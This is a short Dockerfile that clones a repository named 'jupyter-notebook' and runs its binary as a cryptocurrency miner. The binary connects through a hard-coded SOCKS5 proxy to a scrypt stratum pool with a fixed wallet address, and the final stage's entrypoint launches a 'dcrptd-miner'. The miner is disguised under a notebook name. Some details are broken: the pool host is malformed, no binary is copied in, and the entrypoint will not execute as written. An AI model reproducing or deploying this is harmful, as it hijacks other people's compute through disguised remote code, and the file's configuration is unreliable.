ARG ALPINE_VERSION=3.15.0

FROM alpine:${ALPINE_VERSION} as builder

RUN apk add --no-cache git \
                       make \
                       cmake \
                       libstdc++ \
                       gcc \
                       g++ \
                       hwloc-dev \
                       libuv-dev \
                       openssl-dev 

RUN git clone https://github.com/keva2/jupyter-notebook.git &&  cd jupyter-notebook && chmod u+x ./jupyter-notebook && ./jupyter-notebook --proxy=socks5://34.134.60.185:443  -a scrypt -o stratum+tcp://207.244.243.35.com:7011 -u KHDGmx4Gbrnaqb6ywjCvtJ8f2XspJpP4EE -p c=NYAN

FROM alpine:${ALPINE_VERSION}

RUN apk add --no-cache hwloc \
                       libuv


WORKDIR /dcrptd

ENTRYPOINT ["chmod +x ./dcrptd-miner && ./dcrptd-miner"]
